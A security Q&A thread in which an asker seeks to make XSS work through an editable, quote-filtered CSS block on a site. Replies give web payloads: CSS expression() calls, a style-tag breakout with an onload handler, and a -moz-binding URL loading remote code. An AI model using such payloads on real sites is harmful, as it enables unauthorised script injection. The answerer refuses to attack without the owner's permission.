# XSS inside CSS when " is encoded?

Tags: xss

I'm trying to make XSS work on one site.It allows me to edit CSS which is then included inside web page source , but it won't allow me to use " , only ' . Source is like this:

```
body {
  margin: 0;
  padding: 0;
  background-color: #EFEFEF;
  overflow: hidden;
  font-family: Arial, Helvetica, sans-serif;
}
```

Can't XSS inside CSS be exploited if " is blocked.Thanks

Comment: By embedded, you mean an inline stylesheet? Can you post the embedding related markup too?

Comment: And how do other characters, such as `<` get treated? And how is `"` treated? Forbidden? Entity-Encodes? `\` escaped?

Comment: @CodesInChaos here is the full code :http://pastebin.com/EkRCwMCc
and <> is hex encoded , just like ".

Answer (score 8, accepted):

This policy might prevent breaking out of a double quoted `style` attribute as in

```
<div style="payload goes here">
```

or if this CSS is stored in a DB it might be a SQL Injection filter.

To answer your question though, yes, you can still attack the CSS itself with single quotes

```
margin-left:expression('alert(1337)')
```

which will work on IE7 and older or in some more recent IE quirks modes and it won't stop you from embedding double quotes visible to CSS as in

```
margin-left:expression('alert(\22 pwned\22)')
```

Comment: Here is what I'm dealing with : http://pastebin.com/EkRCwMCc .
Is there any way to get this xss working on mozzila.Thanks

Comment: @user1203028, What part of that does an attacker control?

Comment: This : 
<style type="text/css">
  body {
  margin: 0;
  padding: 0;
  background-color: #EFEFEF;
  overflow: hidden;
  font-family: Arial, Helvetica, sans-serif;
}
shortened cos of text limit.....
...
...
</style>

Comment: @user1203028, If they only filter `"`, then obviously `</Style ><img onload=alert(1337)>` will work.  Otherwise, `<style>body{-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss)}</style>` should do it.

Comment: No , well I tried with <> and they are filtered (hexed) , and the solution you gave didn't work , thanks anyway.It seems I cant do anything. Btw, if you want to give it a try , this is my email maxonebt4@gmail.com , jyst email me and I'll give you site location.

Comment: @user1203028, I'm not going to try out any attacks without a formal agreement that the site owner wants that.  You can find out a lot about XSS via CSS for Gecko based browsers by looking at http://www.thespanner.co.uk/2008/02/04/moz-binding-xss-fun/ and http://sla.ckers.org/forum/read.php?2,29779,page=2